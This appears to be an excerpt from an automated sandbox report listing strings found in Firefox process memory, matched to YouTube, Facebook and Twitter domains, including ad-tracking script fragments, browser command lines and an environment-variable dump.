Source: firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "="},trackingParams:hb+"="}},adLayoutLoggingData:{serializedAdServingDataEntry:ed},skipPings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+y+"&cid="+oa+"&label=videoskipped&ad_mt=[AD_MT]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"},{baseUrl:"https://ade.googlesyndication.com/ddm/activity_ext/dc_pubid="+ja+";dc_exteid="+kb+";met="+ja+";ecn"+ja+"="+ja+";etm1="+ja+";eid1="+ib+";acvw=[VIEWABILITY];gv=[GOOGLE_VIEWABILITY]?"}],layoutId:"1ID7Gdwk2vV7OZ1A"}}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "="}},hoverText:{runs:[{text:ld}]},trackingParams:hb+"="}},adVideoId:Fc,impressionPings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+y+"&cid="+oa+"&label=video_companion_reshow_tracking"}],adLayoutLoggingData:{serializedAdServingDataEntry:ld},isContentVideoCompanion:!0,associatedCompositePlayerBytesLayoutId:Ic}},adSlotLoggingData:{serializedSlotAdServingDataEntry:jd}}}],adBreakHeartbeatParams:"Q0FBJTNE",frameworkUpdates:{entityBatchUpdate:{mutations:[{entityKey:Se, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "AxAA&ase=2&num="+ja+"&cid="+oa+"&ad_cpn=%5BAD_CPN%5D&sig="+fa+"&adurl="+Oc+"&label=video_click_to_advertiser_site&ctype="+Db+"&ms=[CLICK_MS]",target:"TARGET_NEW_WINDOW",attributionSrcMode:"ATTRIBUTION_SRC_MODE_LABEL_CHROME"}},trackingParams:hb+"=",backgroundImage:{thumbnail:{thumbnails:[{url:""}]},trackingParams:hb+"="},abandonCommands:{commands:[{clickTrackingParams:Bc,loggingUrls:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+Fc+"&cid="+oa+"&label=video_abandon&ad_mt=[AD_MT]&ad_tos=[AD_TOS]&ad_wat=[AD_WAT]&final=[FINAL]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.2454374100.0000023A251E0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.4727131464.0000020338F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.4718221427.0000020338CF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login equals www.facebook.com (Facebook)
Source: firefox.exe, 00000031.00000002.4718221427.0000020338CF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/loginF equals www.facebook.com (Facebook)
Source: firefox.exe, 00000032.00000002.2594126672.00000274DAAD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com --attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000002.2671832749.000002650D203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "https://www.youtube.com/aboutthisad?pf=web&source=youtube&reasons=A"+T+"&hl="+Ga+"&origin=www.youtube.com&ata_theme="+He,Tf),trackingParams:hb+"="}},popupType:"DIALOG"}},icon:{iconType:"INFO_OUTLINE"},trackingParams:hb+"="}},hoverText:{runs:[{text:Hc}]},trackingParams:hb+"="}},flyoutCtaRenderer:{flyoutCtaRenderer:{image:{thumbnail:{thumbnails:[{url:"https://yt3.ggpht.com/ytc/"+we+"=s176-c-k-c0x00ffffff-no-rj"}]},trackingParams:hb+"="},headline:{text:Ie,isTemplated:!1,trackingParams:hb+"="},description:{text:Ld, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "https://www.youtube.com/aboutthisad?pf=web&source=youtube&reasons=A"+T+"&hl="+Ga+"&origin=www.youtube.com&ata_theme="+He,Ug),trackingParams:hb+"="}},popupType:"DIALOG"}},trackingParams:hb+"="}},hoverText:{runs:[{text:Ic}]},trackingParams:hb+"="}},adVideoId:Fc,impressionPings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+y+"&cid="+oa+"&label=video_companion_impression_tracking"}],adLayoutLoggingData:{serializedAdServingDataEntry:jd},associatedCompositePlayerBytesLayoutId:Ic}}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2981976697.0000026F5D82C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000033.00000003.2983155830.0000026F5D83D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Wikipedia"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Reddit"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Twitter"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 00000026.00000002.2494708399.000002014BF00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 2"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com equals www.youtube.com (Youtube)
Source: LOG15.36.dr	String found in binary or memory: 2024/01/18-00:34:45.489 22f8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb since it was missing. equals www.youtube.com (Youtube)
Source: LOG15.36.dr	String found in binary or memory: 2024/01/18-00:34:45.508 22f8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb/MANIFEST-000001 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C71C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2819553305.0000026F4E992000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2640984970.0000026F4E992000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2640984970.0000026F4E9D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000031.00000002.4727131464.0000020338F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8{ec8030f7-c20a-464f-9b0e-13a3a9e97384}MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.facebook.com/loginp equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2671229522.000002650D090000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: :z+%"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com0 equals www.youtube.com (Youtube)
Source: 70DE259D3055F51A1BEBD035A0E461EC8E9213A5.51.dr	String found in binary or memory: ;var Q=A.window,R,S,T=(null==Q?void 0:null==(R=Q.yt)?void 0:R.config_)\|\|(null==Q?void 0:null==(S=Q.ytcfg)?void 0:S.data_)\|\|{};B("yt.config_",T);var U=Object.freeze("document.appendChild document.body.appendChild document.querySelector document.querySelectorAll history.back history.go".split(" ")),V=Object.freeze("fonts.googleapis.com s0.2mdn.net securepubads.g.doubleclick.net ssl.google-analytics.com static.doubleclick.net www.google-analytics.com www.googletagservices.com www.youtube.com youtube.com".split(" ")),W=Object.freeze(["pkedcjkdefgpdelpbcmbmeomcjbeemfm","fjhoaacokmgbjemoflkofnenfaiekifl","enhhojjnijigcajfphajepfemndkmdlo"]),X= equals www.youtube.com (Youtube)
Source: firefox.exe, 00000031.00000002.4737168375.000002033A7EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.facebook.com/loginMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSG equals www.facebook.com (Facebook)
Source: firefox.exe, 00000031.00000002.4737168375.000002033A7A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.facebook.com/loginMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.facebook.com (Facebook)
Source: firefox.exe, 00000031.00000003.2761334389.000002033A7EB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000003.2604866040.000002033A7EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.facebook.com/loginMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsq equals www.facebook.com (Facebook)
Source: firefox.exe, 00000034.00000002.2672529573.000002650EEC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.comMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsy equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: B+"____________"+D+"AxAA&sigh="+Fc+"&cid="+oa+"&ad_cpn=[AD_CPN]&lact=[LACT]"},{baseUrl:"https://www.youtube.com/api/stats/ads?ver="+ja+"&ns="+ja+"&event="+ja+"&device="+ja+"&content_v="+y+"&el="+ed+"&ei="+ba+"&devicever="+c+"&bti="+ib+"&format="+ac+"&break_type="+ja+"&conn=[CONN]&cpn=[CPN]&lact=[LACT]&m_pos="+ja+"&mt=[MT]&p_h=[P_H]&p_w=[P_W]&rwt=[RWT]&sdkv="+Ya+"&slot_pos="+ja+"&slot_len="+ja+"&vis=[VIS]&vol=[VOL]&wt=[WT]&ad_cpn=[AD_CPN]&ad_id="+ud+"&ad_len="+Hb+"&ad_mt=[AD_MT]&ad_sys=YT%3AAdSense-Viral%2CAdSense-Viral&ad_v="+ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: B+"____________"+D+"AxAA&sigh="+Fc+"&cid="+oa+"&label=videoskipped&ad_mt=[AD_MT]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"},{baseUrl:"https://ade.googlesyndication.com/ddm/activity_ext/dc_pubid="+ja+";dc_exteid="+kb+";met="+ja+";ecn"+ja+"="+ja+";etm1="+ja+";eid1="+ib+";acvw=[VIEWABILITY];gv=[GOOGLE_VIEWABILITY]?"}],closePings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+Fc+"&cid="+oa+"&label=adclose&ad_mt=[AD_MT]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"}], equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: B+"____________"+D+"AxAA&sigh="+y+"&cid="+oa+"&label=adpause&ad_mt=[AD_MT]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"},{baseUrl:"https://ade.googlesyndication.com/ddm/activity_ext/dc_pubid="+ja+";dc_exteid="+kb+";met="+ja+";ecn"+ja+"="+ja+";etm1="+ja+";eid1="+eb+";acvw=[VIEWABILITY];gv=[GOOGLE_VIEWABILITY]?"}],rewindPings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+y+"&cid="+oa+"&label=adrewind&ad_mt=[AD_MT]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"}], equals www.youtube.com (Youtube)
Source: 69455E9F6ABEDFC78866EDEA94CB9D51C573A013.51.dr	String found in binary or memory: BO^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/necko:classified1 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.2454374100.0000023A251E0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.4718221427.0000020338CF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.facebook.com/login equals www.facebook.com (Facebook)
Source: firefox.exe, 00000030.00000002.2593916370.000001838BEC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.facebook.com/login--attempting-deelevation equals www.facebook.com (Facebook)
Source: firefox.exe, 00000032.00000002.2594126672.00000274DAAD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com--attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 00000026.00000002.2494708399.000002014BF09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.comT equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000002.2671229522.000002650D090000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.comy equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.2454374100.0000023A251E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/loginC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.facebook.com (Facebook)
Source: firefox.exe, 00000026.00000002.2494708399.000002014BF00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.comC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 00000030.00000002.2593916370.000001838BEC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.facebook.com (Facebook)
Source: firefox.exe, 00000031.00000002.4718221427.0000020338CF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/loginC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.facebook.com (Facebook)
Source: firefox.exe, 00000032.00000002.2594126672.00000274DAAD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 00000034.00000002.2671229522.000002650D090000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.comC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Defaultt equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Cc+"&el="+ed+"&len="+Kb+"&of="+Bb+"&uga="+eb+"&vm="+Wc},ptrackingUrl:{baseUrl:"https://www.youtube.com/ptracking?ei="+ba+"&m="+lb+"&oid="+Bb+"&plid="+R+"&pltype="+Hc+"&ptchn="+Bb+"&ptk="+H+"&video_id="+y},qoeUrl:{baseUrl:"https://s.youtube.com/api/stats/qoe?cl="+ic+"&docid="+y+"&ei="+ba+"&event="+Rd+"&feature="+m+"&fexp="+Re+"&ns="+Ga+"&plid="+R+"&referrer=https%3A%2F%2Fwww.youtube.com%2F&sdetail=p%3A%2F&sourceid="+Cc},atrUrl:{baseUrl:"https://s.youtube.com/api/stats/atr?docid="+y+"&ei="+ba+"&feature="+ equals www.youtube.com (Youtube)
